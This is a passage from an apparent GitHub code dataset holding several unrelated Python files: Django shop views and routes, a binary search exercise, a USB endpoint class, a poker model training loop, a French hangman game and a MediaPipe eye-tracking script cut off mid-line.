'GREEN']\n\n        # print(labels[pred_idx])\n\n        if labels[pred_idx] == 'NO SEMAPHORE':\n            return TrafficLight.UNKNOWN\n        elif labels[pred_idx] == 'RED':\n            return TrafficLight.RED\n        elif labels[pred_idx] == 'YELLOW':\n            return TrafficLight.YELLOW\n        elif labels[pred_idx] == 'GREEN':\n            return TrafficLight.GREEN\n
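\n\n# Usage sketch (added; hypothetical names): assumes the graph has been built and the\n# pretrained weights restored into a tf.Session; input_shape here is only an example.\n#\n#   classifier = TrafficLightClassifier(input_shape=(64, 64), learning_rate=1e-4)\n#   saver = tf.train.Saver()\n#   with tf.Session() as sess:\n#       saver.restore(sess, classifier.checkpoint_path)\n#       state = classifier.get_classification(sess, bgr_frame)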
\n","repo_name":"jkocsis3/CarNdCapstone","sub_path":"ros/src/tl_detector/light_classification/traffic_light_classifier.py","file_name":"traffic_light_classifier.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19142081593","text":"from django.shortcuts import render,HttpResponse,redirect\nfrom django.http import JsonResponse\nfrom .models import *\nimport json\nimport datetime\nfrom .utils import cookieCart,cartData,guestOrder\nfrom django.views.generic import DetailView\nfrom django.urls import reverse\n\ndef store(request):\n    if request.method == 'POST':\n        try:\n            data = json.loads(request.body.decode('utf-8'))\n            productId = data.get('productId')\n            print('productId:', productId)\n\n            if productId is None:\n                return HttpResponse('Missing productId', status=400)\n\n            product = Product.objects.get(id=productId)\n            print('productId:', product.brand)\n            response_data = {'product_brand': product.brand,\n                             'product_category': product.category,\n                             'product_price': product.price,\n                             'product_description': product.description,\n                             'product_image': product.image.url}\n\n            return JsonResponse(response_data, safe=False)\n\n        except json.JSONDecodeError as e:\n            return HttpResponse(str(e), status=400)\n    elif request.method == 'GET':\n        # Handle GET requests here\n        data = cartData(request)\n        cartItems = data['cartItems']\n        products = Product.objects.all()\n        context = {\n            'products': products,\n            'cartItems': cartItems,\n        }\n        return render(request, \"store/store.html\", context)\n\n    return HttpResponse('Method Not Allowed', status=405)\n\ndef search_category(request):\n    if request.method == 'POST':\n        data = json.loads(request.body.decode('utf-8'))\n        category = data.get('value')  # Use 'value' as the key to match your JSON data\n        products = Product.objects.filter(category=category)\n        product_data = [{'id':product.id,'brand': product.brand, 'category':product.category,'image':product.image.url, 'price': product.price} for product in products]\n\n        response_data = {'message': 'Category received successfully', 'category': category, 'products': product_data}\n        return JsonResponse(response_data)\n\n    return render(request, 'store/store.html')\n\nclass PostDetailView(DetailView):\n    model = Product\n    template_name = 'store/product_detail.html' \n    \n    def post(self, request, *args, **kwargs):\n        product_id = kwargs['pk']\n        review_text = request.POST.get('reviews') \n\n        if review_text:\n            review = Review.objects.create(\n                product_id=product_id,\n                user=request.user,\n                comment_body=review_text,\n            )\n            \n            return redirect('product-detail', pk=product_id)\n        data = cartData(request)\n        cartItems = data['cartItems']\n        context = self.get_context_data(**kwargs)\n        context['form_error'] = 'Please enter a valid review.'\n        context['cartItems'] = cartItems\n        return self.render_to_response(context)\n\ndef cart(request):\n    data = cartData(request)\n    cartItems = data['cartItems']\n    order = data['order']\n    items = data['items']\n    context = {\n        'items':items,'order':order,'cartItems':cartItems\n    }\n    return render(request,\"store/cart.html\",context)\n\n\ndef checkout(request):\n    \n    data = cartData(request)\n    
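# Note (added, assumption): cartData (imported from .utils above) appears to resolve\n    # the cart for logged-in customers and cookie-based guests alike, given the\n    # cookieCart/guestOrder helpers it ships with.\n    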
cartItems = data['cartItems']\n    order = data['order']\n    items = data['items']\n\n    context = {\n        'items':items,\n        'order':order,\n        'cartItems':cartItems,\n    }\n\n    return render(request, \"store/checkout.html\", context)\n\n\ndef updateItem(request):\n    data = json.loads(request.body)\n    productId = data['productId']\n    action = data['action']\n\n    print('Action:', action)\n    print('productId:', productId)\n\n    customer = request.user.customer\n    product = Product.objects.get(id=productId)\n    order, created = Order.objects.get_or_create(customer=customer, complete=False)\n\n    orderItem, created = OrderItem.objects.get_or_create(order=order, product=product)\n    if action == 'add':\n        orderItem.quantity = (orderItem.quantity + 1)\n    elif action == 'remove':\n        orderItem.quantity = (orderItem.quantity - 1)\n\n    orderItem.save()\n\n    if orderItem.quantity <= 0:\n        orderItem.delete()\n\n    return JsonResponse('item was added', safe=False)\n\ndef processOrder(request):\n    transaction_id = datetime.datetime.now().timestamp()\n    data = json.loads(request.body)\n\n    if request.user.is_authenticated:\n        customer = request.user.customer\n        order, created = Order.objects.get_or_create(customer=customer, complete=False)\n    else:\n        customer, order = guestOrder(request, data)\n\n    total = float(data['form']['total'])\n    order.transaction_id = transaction_id\n\n    if total == float(order.get_cart_total):\n        order.complete = True\n    \n    order.save()\n\n    if order.shipping:\n        try:\n            \n            shipping_address = ShippingAddress.objects.get(customer=customer)\n        except ShippingAddress.DoesNotExist:\n            shipping_address = None\n\n        if shipping_address:\n            # Update the existing shipping address\n            shipping_address.address = data['shipping']['address']\n            shipping_address.city = data['shipping']['city']\n            shipping_address.state = data['shipping']['state']\n            shipping_address.zipcode = data['shipping']['zipcode']\n        else:\n            # Create a new shipping address\n            shipping_address = ShippingAddress(\n                customer=customer,\n                order=order,\n                address=data['shipping']['address'],\n                city=data['shipping']['city'],\n                state=data['shipping']['state'],\n                zipcode=data['shipping']['zipcode'],\n            )\n        shipping_address.save()\n\n    return JsonResponse(\"payment complete\", safe=False)","repo_name":"ashinkj/shoppers-shoppy","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28471542199","text":"from concurrent.futures import ThreadPoolExecutor\nfrom tornado import gen\nfrom tornado.ioloop import IOLoop\n\nthread_pool = ThreadPoolExecutor(2)\n\ndef mySleep(count):\n\timport time\n\tfor I in range(count):\n\t\ttime.sleep(1)\n\n@gen.coroutine\ndef call_blocking():\n\tprint(\"start of call_blocking\")\n\tyield thread_pool.submit(mySleep, 10)\n\tprint(\"end of call_blocking\")\n\nif __name__ == '__main__':\n\t# A coroutine must be driven by the IOLoop; calling it directly only creates\n\t# a Future. run_sync drives it to completion.\n\tIOLoop.current().run_sync(call_blocking)","repo_name":"haowenchao123/python_web","sub_path":"frames/Tornado/coroutine_pool.py","file_name":"coroutine_pool.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1972091276","text":"# Uses python3\nimport sys\nfrom math import floor\n\ndef binary_search(a, x, low=0, high=None):\n    if high is None:\n        high = len(a)\n\n    mid = int(floor( low + (high - low) / 2. 
) )\n \n if low > high or mid >= len(a):\n return -1 \n\n if a[mid] == x:\n return mid\n\n elif a[mid] > x:\n return binary_search(a,x,low, mid-1)\n elif a[mid] < x: \n return binary_search( a, x,mid+1,high )\n return -1\n\n\ndef linear_search(a, x):\n for i in range(len(a)):\n if a[i] == x:\n return i\n return -1\n\nif __name__ == '__main__':\n \n input = sys.stdin.read()\n data = list(map(int, input.split()))\n n = data[0]\n m = data[n + 1]\n a = data[1 : n + 1]\n for x in data[n + 2:]:\n # replace with the call to binary_search when implemented\n print(binary_search(a, x), end = ' ')\n ","repo_name":"leclair-7/Didactics","sub_path":"AlgorithmToolbox/week4_divide_and_conquer/1_binary_search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4186921682","text":"from django.urls import path, re_path\nfrom haystack.forms import HighlightedSearchForm\nfrom goorchids.site import views\nfrom django.contrib.flatpages import views as flatpages_views\n\n\nurlpatterns = [\n # Home page\n path('', views.home_view, name='site-home'),\n path('location-suggestions/', views.location_suggestions_view,\n name='site-location-suggestions'),\n path('key-by-location/', views.redirect_to_simple_key_by_location),\n path('plant-name-suggestions/', views.plant_name_suggestions_view,\n name='plant-name-suggestions'),\n path('search-suggestions/', views.search_suggestions_view,\n name='site-search-suggestions'),\n\n # Search results\n path('search/',\n views.GoOrchidsSearchView(\n template='search.html',\n form_class=HighlightedSearchForm,\n ),\n name='search',\n ),\n re_path(r'family/(?P<family_slug>[a-z]+)/',\n views.family_view, name='site-family'),\n re_path(r'genus/(?P<genus_slug>[a-z]+)/',\n views.genus_view, name='site-genus'),\n re_path(r'species/(?P<genus_slug>[a-z]+)/(?P<epithet>[-a-z]+)/',\n views.species_view, name='site-species'),\n re_path(r'api/maps/(?P<genus>[^/-]+)-(?P<epithet>[^/]+)-na-state-distribution-map(\\.svg|/)',\n views.north_american_distribution_map,\n name='na-state-distribution-map'),\n path('about/', flatpages_views.flatpage, {'url': '/about/'}, name='site-about'),\n path('privacy/', flatpages_views.flatpage, {'url': '/privacy/'}, name='site-privacy'),\n path('terms-of-use/', flatpages_views.flatpage, {'url': '/terms-of-use/'}, name='site-terms-of-use'),\n]\n","repo_name":"jazkarta/goorchids-app","sub_path":"goorchids/site/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37486224474","text":"# USBEndpoint.py\n#\n# Contains class definition for USBEndpoint.\n\nclass USBEndpoint:\n direction_out = 0x00\n direction_in = 0x01\n\n transfer_type_control = 0x00\n transfer_type_isochronous = 0x01\n transfer_type_bulk = 0x02\n transfer_type_interrupt = 0x03\n\n sync_type_none = 0x00\n sync_type_async = 0x01\n sync_type_adaptive = 0x02\n sync_type_synchronous = 0x03\n\n usage_type_data = 0x00\n usage_type_feedback = 0x01\n usage_type_implicit_feedback = 0x02\n\n def __init__(self, number, direction, transfer_type, sync_type,\n usage_type, max_packet_size, interval, handler):\n\n self.number = number\n self.direction = direction\n self.transfer_type = transfer_type\n self.sync_type = sync_type\n self.usage_type = usage_type\n self.max_packet_size = max_packet_size\n self.interval = interval\n self.handler = 
handler\n\n        self.interface = None\n\n        self.request_handlers = {\n            1 : self.handle_clear_feature_request\n        }\n\n    def handle_clear_feature_request(self, req):\n        print(\"received CLEAR_FEATURE request for endpoint\", self.number,\n                \"with value\", req.value)\n        self.interface.configuration.device.maxusb_app.send_on_endpoint(0, b'')\n\n    def set_interface(self, interface):\n        self.interface = interface\n\n    # see Table 9-13 of USB 2.0 spec (pdf page 297)\n    def get_descriptor(self):\n        address = (self.number & 0x0f) | (self.direction << 7) \n        attributes = (self.transfer_type & 0x03) \\\n                   | ((self.sync_type & 0x03) << 2) \\\n                   | ((self.usage_type & 0x03) << 4)\n\n        d = bytearray([\n                7,          # length of descriptor in bytes\n                5,          # descriptor type 5 == endpoint\n                address,\n                attributes,\n                self.max_packet_size & 0xff,          # wMaxPacketSize is little-endian:\n                (self.max_packet_size >> 8) & 0xff,   # low byte first, then high byte\n                self.interval\n        ])\n\n        return d\n\n    def send(self, data):\n        dev = self.interface.configuration.device\n        dev.maxusb_app.send_on_endpoint(self.number, data)\n\n    def recv(self):\n        dev = self.interface.configuration.device\n        data = dev.maxusb_app.read_from_endpoint(self.number)\n        return data\n\n","repo_name":"usb-tools/USBProxy-legacy","sub_path":"src/bindings/python/USBEndpoint.py","file_name":"USBEndpoint.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":418,"dataset":"github-code","pt":"48"} +{"seq_id":"40917459285","text":"from poker_simulation import Simulation \r\nfrom Texasholdem import env\r\nimport tensorflow as tf\r\nfrom tqdm import trange\r\nimport random\r\nfrom collections import deque\r\n\r\n\r\n# mae = tf.keras.losses.MeanAbsoluteError()\r\ncategorical_cross_entropy = tf.keras.losses.CategoricalCrossentropy()\r\noptimizer = tf.keras.optimizers.Adam(learning_rate=0.001)\r\n\r\nenv = env(True)\r\nsim = Simulation()\r\nsimulation_num = 3000 #600\r\n\r\n# def one_hot_encoding(cards:list) -> list:\r\n#     frame = [0 for i in range(52)] # a list of 52 zeros\r\n#     def card_to_index(card:tuple) -> int:\r\n#         num = card[0]*13 + card[1] - 1 # 2~A(14) # convert base-13 to base-10\r\n#         return num - 1 # indices start at 0\r\n#     \r\n#     for card in cards: frame[card_to_index(card)] = 1\r\n#     return frame\r\n\r\n\r\nmodel = tf.keras.models.load_model('Trained_Model_08_21')\r\n\r\nreplaymemory = deque(maxlen=1000)\r\n\r\nnum = 600\r\nfor _ in trange(num):\r\n    env() # reset the deck\r\n    dataset = []\r\n\r\n    start_money = 30\r\n    my_money = start_money; opponent_money = start_money\r\n    pot_size = 0; betting = 1\r\n\r\n    community_card, human_hand, computer_hand = [], [] ,[]\r\n    community_card = env.draw(community_card, 3)\r\n    human_hand = env.draw(human_hand, 2); computer_hand = env.draw(computer_hand, 2)\r\n\r\n    results = sim(num=simulation_num, community_card=community_card, my_hand=human_hand, opponent_hand=computer_hand, opponent_action_num=0, pot_size=pot_size, loss = 0, shape_to_num=True)\r\n    if results == 1:\r\n        betting *= 2\r\n    pot_size += betting\r\n    loss = -1*betting\r\n    dataset.append([community_card, human_hand, computer_hand, results, betting, pot_size])\r\n\r\n    action = random.choice([0, 1])\r\n    if action == 0: # call\r\n        # loss = -1*betting\r\n        pot_size += betting\r\n    elif action == 1: # raise\r\n        betting *= 2\r\n        # loss = -1*betting\r\n        pot_size += betting\r\n    results = sim(num=simulation_num, community_card=community_card, my_hand=human_hand, opponent_hand=computer_hand, opponent_action_num=action, pot_size=pot_size, loss = loss, shape_to_num=True)\r\n    if results == 0 or results == 1: # call\r\n        loss -= 2 # <<<\r\n        pot_size += 2\r\n        
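# Note (added): 'loss' tracks this hand's stake as a negative amount while\r\n        # 'pot_size' tracks the shared pot; both are fed back into the simulator.\r\n        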
dataset.append([community_card, human_hand, computer_hand, 0, betting, pot_size])\r\n\r\n    elif results == 2: # fold\r\n        continue\r\n\r\n    # action = random.choice([0, 2])\r\n    # elif action == 2: # fold\r\n    #     continue\r\n\r\n    betting = 1\r\n    community_card = env.draw(community_card, 2)\r\n    results = sim(num=simulation_num, community_card=community_card, my_hand=human_hand, opponent_hand=computer_hand, opponent_action_num=0, pot_size=pot_size, loss = 0, shape_to_num=True)\r\n    if results == 1:\r\n        betting *= 2\r\n    pot_size += betting\r\n    dataset.append([community_card, human_hand, computer_hand, results, betting, pot_size])\r\n    for n, [cc, hh, ch, action, betting, pot_size] in enumerate(dataset):\r\n        if action == 2: action = 0\r\n        c_c = [i[1]-2 for i in cc]; h_h = [i[1]-2 for i in hh]; c_h = [i[1]-2 for i in ch]\r\n        community_card = tf.one_hot(c_c, depth=13)\r\n        if len(community_card) == 3:\r\n            tensor = tf.constant([[0 for i in range(13)] for p in range(2)], dtype=tf.float32)\r\n            community_card = tf.concat([community_card, tensor], axis=0)\r\n        human_hand = tf.one_hot(h_h, depth=13)\r\n        computer_hand = tf.one_hot(c_h, depth=13)\r\n        action = tf.one_hot([action], depth=2)\r\n        data = tf.concat([tf.reshape(community_card, (1, -1)), tf.reshape(computer_hand, (1, -1)), action], axis=1)\r\n        label = tf.reshape(human_hand, shape=[1,-1])\r\n        dataset[n] = [data, label]\r\n\r\n    for i in dataset:\r\n        replaymemory.append(i)\r\n\r\n    if len(replaymemory) > 300: # enough data has accumulated\r\n        batch_size = 16\r\n        batch_data = random.sample(replaymemory, batch_size)\r\n        \r\n        train_x, train_y = [], []\r\n        for data, label in batch_data:\r\n            train_x.append(data)\r\n            train_y.append(label)\r\n        x_train = tf.reshape(tf.convert_to_tensor(train_x), [-1, 93])\r\n        y_train = tf.reshape(tf.convert_to_tensor(train_y), [-1, 26])\r\n\r\n        epochs = 4\r\n\r\n        history = model.fit(\r\n            x_train, y_train,\r\n            batch_size=batch_size, epochs=epochs,\r\n        )\r\n\r\n        history.history\r\n        # for _ in range(epochs):\r\n        #     for n, x in enumerate(train_x):\r\n        #         with tf.GradientTape() as tape:\r\n        #             tape.watch(model.trainable_weights)\r\n        #             prediction = model(x)\r\n        #             # loss = mae(train_y[n], prediction) \r\n        #             loss = categorical_cross_entropy(train_y[n], prediction) \r\n        #         gradients = tape.gradient(loss, model.trainable_weights)\r\n        #         optimizer.apply_gradients(zip(gradients, model.trainable_weights))\r\n\r\n# print(replaymemory)\r\nmodel.save('Trained_Model_number_08_20')","repo_name":"EricHW55/Poker-Bot","sub_path":"model_train_simulation.py","file_name":"model_train_simulation.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36033414734","text":"# -*- coding: utf-8 -*-\nimport random\nimport urllib.request\nimport os\nimport hashlib\nimport unicodedata\nfrom pathlib import Path\nfrom stat import S_IREAD, S_IRGRP, S_IROTH, S_IWUSR\n\n#question = 1\nword_length = 4 # minimum word length\ncustom_path_name = 'game_data' # path where word lists are stored\npoints_score_letter = 7\npoints_score_false = 3\n\ndef checksum(file_checksum, md5):\n    hasher1 = hashlib.md5()\n    afile1 = open(file_checksum, 'rb')\n    buf1 = afile1.read()\n    hasher1.update(buf1)  # update() mutates the hasher in place and returns None\n    md5_a = str(hasher1.hexdigest())\n    # Base-checksum already defined on section 'selector'\n\n    # Compare md5\n    if md5_a != md5:\n        print(md5_a)\n        print(md5)\n        print(\"Checksums WRONG \\n\")\n        try:\n            os.remove(file_checksum)\n        except OSError as e: # if failed, report it back to the user #\n            print(\"Error: %s - 
%s.\" % (e.filename, e.strerror))\n download()\n\ndef jeu():\n question = 0\n\n ####################################\n # Download and check the word list #\n ####################################\n\n # Selector to choose the type of the word to guess\n while True:\n print('Quel type de mot voulez-vous devinez ? (choisir par un chiffre entre 1-5)')\n print('1. Les noms')\n print('2. Les adjectifs')\n print('3. Les adverbes')\n print(\"4. Les verbes à l'infinitif\")\n choice = input(\"5. L'ensemble (dictionnaire)\\n> \")\n try:\n choice = int(choice)\n if choice > 5 or choice < 1:\n print(\"Valeur saisie non valide.\", end=\" \")\n continue\n else:\n break\n except ValueError:\n print(\"Valeur saisie non valide.\", end=\" \")\n continue\n\n # url list and checksums of original files\n if choice == 1:\n choice = 'nouns.txt'\n md5_b = 'bebdef79615cb1802e484cef6b7193e5'\n if choice == 2:\n choice = 'adjectives.txt'\n md5_b = 'cc863fa29842d9e3fb36c191f572ca12'\n if choice == 3:\n choice = 'adverbs.txt'\n md5_b = '06e80ad48aa32094ed7f1938759f853d'\n if choice == 4:\n choice = 'infinitives.txt'\n md5_b = '6d5edf8b0e0eefe725d10cf9c79cf055'\n if choice == 5:\n choice = 'dictionary.txt'\n md5_b = '72baa94546475f2e17a85b3f1134ec9c'\n\n url = 'https://github.com/Debian-10/French-Dictionary/raw/no-genders-types-indicators/dictionary/%s' % choice\n file_name = url.split('/')[-1]\n\n\n def download():\n u = urllib.request.urlopen(url, file_name.encode('utf_8'))\n file_size = eval(u.info()['Content-Length'])\n file_size = int(file_size / 1000)\n data = u.read()\n f = open(file_name, 'wb')\n f.write(data)\n f.close()\n\n # Check if the file already exists and his path\n cwd = os.getcwd()\n folder = os.path.join(cwd, custom_path_name)\n try:\n os.mkdir(folder)\n except OSError:\n print(\"\")\n else:\n print(\"\")\n my_file = Path(folder, file_name)\n os.chdir(folder)\n try:\n my_path = my_file.resolve(strict=True)\n except FileNotFoundError:\n # Download the wordlist\n download()\n else:\n print(\"\")\n\n #########################################\n # Ask player's name and check his score #\n #########################################\n\n os.chdir(folder)\n save_name = input('Entrez votre nom. 
').title()\n\n\n # Checking of the checksum\n # Downloaded or already existing file\n checksum(my_file, md5_b)\n\n ####################\n # The Game himself #\n ####################\n\n def strip_accents(text):\n\n try:\n text = unicode(text, 'utf-8')\n except NameError: # unicode is a default on python 3\n pass\n\n text = unicodedata.normalize('NFD', text) \\\n .encode('ascii', 'ignore') \\\n .decode(\"utf-8\")\n\n return str(text)\n\n # Choose random word to guess\n c = 0\n c1 = 1\n noprint = 0\n existe = 0\n false = 0\n while True:\n word = random.choice(open(file_name).read().split()).strip()\n if len(word) > word_length:\n word = word\n length = len(word)\n break\n word = list(strip_accents(word))\n if \"-\" in word:\n word.remove(\"-\")\n hangman = (\n \"\"\"\n \n \n \n \n \n \n ___ \n \"\"\",\n\n \"\"\"\n \n | \n | \n | \n | \n | \n | \n |___ \n \"\"\",\n\n \"\"\"\n _________\n |/ \n | \n | \n | \n | \n | \n |___ \n \"\"\",\n\n \"\"\"\n _________\n |/ | \n | \n | \n | \n | \n | \n |___ \n \"\"\",\n\n \"\"\"\n _________ \n |/ | \n | (_)\n | \n | \n | \n | \n |___ \n \"\"\",\n\n \"\"\"\n ________ \n |/ | \n | (_) \n | | \n | | \n | \n | \n |___ \n \"\"\",\n\n \"\"\"\n _________ \n |/ | \n | (_) \n | /| \n | | \n | \n | \n |___ \n \"\"\",\n\n\n \"\"\"\n _________ \n |/ | \n | (_) \n | /|\\ \n | | \n | \n | \n |___ \n \"\"\",\n\n\n \"\"\"\n ________ \n |/ | \n | (_) \n | /|\\ \n | | \n | / \n | \n |___ \n \"\"\",\n\n\n \"\"\"\n ________\n |/ | \n | (_) \n | /|\\ \n | | \n | / \\ \n | \n |___ \n \"\"\")\n\n print(\"Mot trouvé dans le dictionnaire...Le jeu commence !\\n \\n\")\n deja_saisie = []\n max_false = len(hangman) - 1\n guess = False\n hidden = []\n for i in range(0, length):\n hidden.append(\"*\")\n print(\"Le mot à deviner est :\", *hidden, sep=\" \")\n while guess == False:\n while True:\n c += 1\n if c>1 and noprint==0:\n print(*hidden, sep=\" \")\n print(hangman[false])\n print(\"Rentrez la lettre n°\",c1)\n choice1 = input(\"\\n> \")\n if choice1.isalpha() == True:\n if len(choice1) > 1:\n print(\"Trop de charactères saisis.\", end=\" \")\n continue\n else:\n break\n else:\n print(\"Valeur saisie non valide.\", end=\" \")\n noprint = 1\n continue\n\n if choice1 in word:\n for i in range(len(word)):\n if hidden[i] == choice1.upper():\n existe = 1\n break\n if word[i] == choice1:\n hidden[i] = choice1.upper()\n existe = 0\n if existe == 1:\n print(\"lettre déjà saisie !\")\n else:\n print(\"Lettre trouvée !\")\n c1 += 1\n noprint=0\n\n if choice1 not in word:\n if false < max_false and choice1 not in deja_saisie:\n print(\"Lettre non trouvée !\")\n deja_saisie.append(choice1)\n false += 1\n else:\n print(\"\")\n\n if \"*\" not in hidden:\n print(\"Et le mot est : \\n\")\n print(*hidden, sep=\" \")\n print(\"Vous avez gagné en\", c, \"tentatives ! 
\\n\")\n\n ################\n # Scores etc...#\n ################\n score_file = Path(folder, \"score\")\n try:\n score_path = score_file.resolve(strict=True)\n except FileNotFoundError:\n print(\"\")\n else:\n print(\"\")\n os.chmod(\"score\", S_IWUSR | S_IREAD)\n\n total_score = c1 * points_score_letter - false * points_score_false\n save_score = total_score\n meilleur = 0\n\n # look for highscore\n try:\n fichier = open(\"score\", \"r\")\n for line in fichier.readlines():\n\n line_parts = line.split(\" a un score de \")\n if len(line_parts) > 1:\n line_parts = line_parts[-1].split(\"\\n\")\n score = line_parts[0]\n # compare scores\n if score.isdigit() and int(score) > meilleur:\n meilleur = int(score)\n except FileNotFoundError:\n pass\n\n if int(save_score) > meilleur:\n fichier = open(\"score\", \"a\")\n fichier.write(\"\\n\" + str(save_name) + ' a un score de ' + str(save_score) + \"\\n\")\n fichier.close()\n\n print(\"\\n\")\n fichier = open(\"score\", \"r\")\n tout_lire = fichier.read()\n print(tout_lire)\n fichier.close()\n guess = True\n if max_false == false:\n print(hangman[false])\n print(\"Perdu ! le mot à deviner était :\", *word, sep=\" \")\n #question = 1\n guess = True\n #question = 1\n os.chmod(\"score\", S_IREAD)\n# Ask if player wants to play again\n#\n#while question == 1:\n# jouer = str(input(\"voulez-vous jouer ? (oui / non) \\n\"))\n# if jouer == \"oui\" or jouer == \"o\" or jouer == \"O\":\n# jeu()\n# elif jouer == \"non\" or jouer == \"n\" or jouer == \"N\":\n# input(\"Appuyez sur une touche pour continuer... \")\n# question = 0\njeu()","repo_name":"NewRedsquare/Python-ICN","sub_path":"Jeu ICN.py","file_name":"Jeu ICN.py","file_ext":"py","file_size_in_byte":10671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41287129993","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\nimport math\n\nface_input = 'media/face.mp4'\nfront_input = 'media/front.mp4'\nface_output = 'output/face_outupt.mp4'\nfront_output = 'output/front_output.mp4'\nfps = 24\nsize = 0.5 #between 0 and 1\ndistance_from_center = 0 # +ve distance means below center, -ve distance means above center\nx_size = 100\nx_border = 200\nbrightness = 0\n\nx1,y1,x2,y2 = 0,0,0,0\niris_pos = ''\nLEFT_EYE = [362, 382, 381, 380, 374, 373, 390, 249, 263, 466, 388, 387, 386, 385,384, 398]\nRIGHT_EYE= [33, 7, 163, 144, 145, 153, 154, 155, 133, 173, 157, 158, 159, 160, 161 , 246] \nRIGHT_IRIS = [474, 475, 476, 477]\nLEFT_IRIS = [469, 470, 471, 472]\nL_H_LEFT = [33]\nL_H_RIGHT = [133]\nR_H_LEFT = [362]\nR_H_RIGHT = [263]\n\nmp_face_mesh = mp.solutions.face_mesh\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\n\ndrawing_spec = mp_drawing.DrawingSpec(thickness=1,circle_radius=1)\n\ncv2.namedWindow('Face Camera', cv2.WINDOW_NORMAL)\ncv2.namedWindow('Front Camera', cv2.WINDOW_NORMAL)\nface_camera = cv2.VideoCapture(face_input)\nfront_camera = cv2.VideoCapture(front_input)\nif face_input == 0:\n face_camera.set(3,1280)\n face_camera.set(4,720) \nw1 = int(face_camera.get(3))\nh1 = int(face_camera.get(4)) \nw = int(front_camera.get(3))\nh = int(front_camera.get(4))\n\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nout1 = cv2.VideoWriter(face_output,fourcc,fps,(w1,h1))\nout2 = cv2.VideoWriter(front_output,fourcc,fps,(w,h))\n\ncenter_y = h/2 + distance_from_center\nysize = h/2 * size\ntop_point_y = int(center_y - ysize)\nbottom_point_y = int(center_y + ysize)\n\n\ndef fillPolyTrans(img, points, color, opacity):\n 
list_to_np_array = np.array(points, dtype=np.int32)\n overlay = img.copy() # coping the image\n cv2.fillPoly(overlay,[list_to_np_array], color )\n new_img = cv2.addWeighted(overlay, opacity, img, 1 - opacity, 0)\n # print(points_list)\n img = new_img\n cv2.polylines(img, [list_to_np_array], True, color,1, cv2.LINE_AA)\n return img\n\ndef euclidean_distance(point1, point2):\n x1,y1 = point1\n x2,y2 = point2\n distance = math.sqrt((x2-x1)**2 + (y2-y1)**2)\n return distance\n\ndef iris_position(iris_center, left_point, right_point):\n total_distance = euclidean_distance(left_point, right_point)\n center_to_right_distance = euclidean_distance(iris_center, right_point)\n ratio = center_to_right_distance / total_distance\n if ratio <= 0.4:\n iris_pos = 'RIGHT'\n elif ratio > 0.4 and ratio <= 0.6:\n iris_pos = 'CENTER'\n else:\n iris_pos = 'LEFT'\n return iris_pos, ratio\n\ndef landmarksDetection(img, results, draw=False):\n img_height, img_width = img.shape[:2]\n \n landmarks_list = [(int(point.x * img_width), int(point.y * img_height)) for point in results.multi_face_landmarks[0].landmark]\n if draw:\n [cv2.circle(img, p, 2, (0,255,0), -1) for p in landmarks_list]\n \n return landmarks_list\n\nwith mp_face_mesh.FaceMesh(\n max_num_faces=1,\n refine_landmarks=True,\n min_detection_confidence=0.5,\n min_tracking_confidence=0.5) as face_mesh:\n \n while face_camera.isOpened():\n ret1, frame1 = face_camera.read()\n ret2, frame2 = front_camera.read()\n if not ret1:\n print('Empty camera frame')\n break\n if not ret2:\n print('Empty fornt frame')\n break\n \n if face_input == 0:\n frame1 = cv2.flip(frame1,1)\n if brightness > 0:\n frame1 = np.int32(frame1) + brightness\n frame1 = np.clip(frame1, 0, 255)\n frame1 = np.uint8(frame1)\n frame1.flags.writeable = False\n frame1 = cv2.cvtColor(frame1,cv2.COLOR_BGR2RGB)\n results = face_mesh.process(frame1)\n \n frame1.flags.writeable = True\n frame1 = cv2.cvtColor(frame1,cv2.COLOR_RGB2BGR)\n\n if results.multi_face_landmarks:\n landmarks_list = landmarksDetection(frame1,results,draw=False)\n \n frame1 = fillPolyTrans(frame1, [landmarks_list[p] for p in LEFT_EYE], (0,255,0), opacity=0.3)\n frame1 = fillPolyTrans(frame1, [landmarks_list[p] for p in RIGHT_EYE], (0,255,0), opacity=0.3)\n frame1 = fillPolyTrans(frame1, [landmarks_list[p] for p in LEFT_IRIS], (0,0,255), opacity=0.2)\n frame1 = fillPolyTrans(frame1, [landmarks_list[p] for p in RIGHT_IRIS], (0,0,255), opacity=0.2)\n \n l_cx = int((landmarks_list[LEFT_IRIS[0]][0] + landmarks_list[LEFT_IRIS[2]][0])/2)\n l_cy = int((landmarks_list[LEFT_IRIS[1]][1] + landmarks_list[LEFT_IRIS[3]][1])/2)\n r_cx = int((landmarks_list[RIGHT_IRIS[0]][0] + landmarks_list[RIGHT_IRIS[2]][0])/2)\n r_cy = int((landmarks_list[RIGHT_IRIS[1]][1] + landmarks_list[RIGHT_IRIS[3]][1])/2)\n \n \n cv2.circle(frame1, (l_cx, l_cy), 4, (0,0,255), -1)\n cv2.circle(frame1, (r_cx, r_cy), 4, (0,0,255), -1)\n \n left_position, left_ratio = iris_position((l_cx,l_cy), landmarks_list[L_H_LEFT[0]], landmarks_list[L_H_RIGHT[0]])\n right_position, right_ratio = iris_position((r_cx,r_cy), landmarks_list[R_H_LEFT[0]], landmarks_list[R_H_RIGHT[0]])\n \n ratio = (left_ratio + right_ratio)/2\n ratio=round(ratio,3)\n \n if ratio <= 0.43:\n iris_pos = 'RIGHT'\n x1 = int(x_border)\n y1 = top_point_y\n x2 = int(w/3 - x_size)\n y2 